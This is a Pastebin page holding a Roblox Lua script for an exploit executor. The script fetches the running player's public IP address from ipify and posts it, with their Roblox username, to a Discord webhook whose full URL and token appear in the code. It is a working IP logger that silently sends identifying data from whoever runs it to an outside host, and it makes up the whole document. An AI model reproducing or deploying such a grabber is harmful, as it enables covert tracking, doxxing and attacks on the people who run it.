Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local IP = (syn and syn.request or request)
- {
- Url = "https://api.ipify.org/",
- Method = "GET",
- Headers = {
- ["Content-Type"] = "application/json"
- },
- };
- IPLOG = {
- ["embeds"] = {{
- ["color"] = 13708129,
- ["description"] = (IP.Body),
- ["author"] = {
- ["name"] = (game.Players.LocalPlayer.Name)
- }}
- }
- }
- local SEND = request(
- {
- Url = "https://discord.com/api/webhooks/946941804895404062/eUd1Nx5N-xTg1t_5h_4O7BWah7tvh4MjnIVhTJ-5yI29cav8DArNAWot9MAc86I1RJTL",
- Method = "POST",
- Headers = {
- ["Content-Type"] = "application/json"
- },
- Body = game:GetService("HttpService"):JSONEncode(IPLOG)
- }
- )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement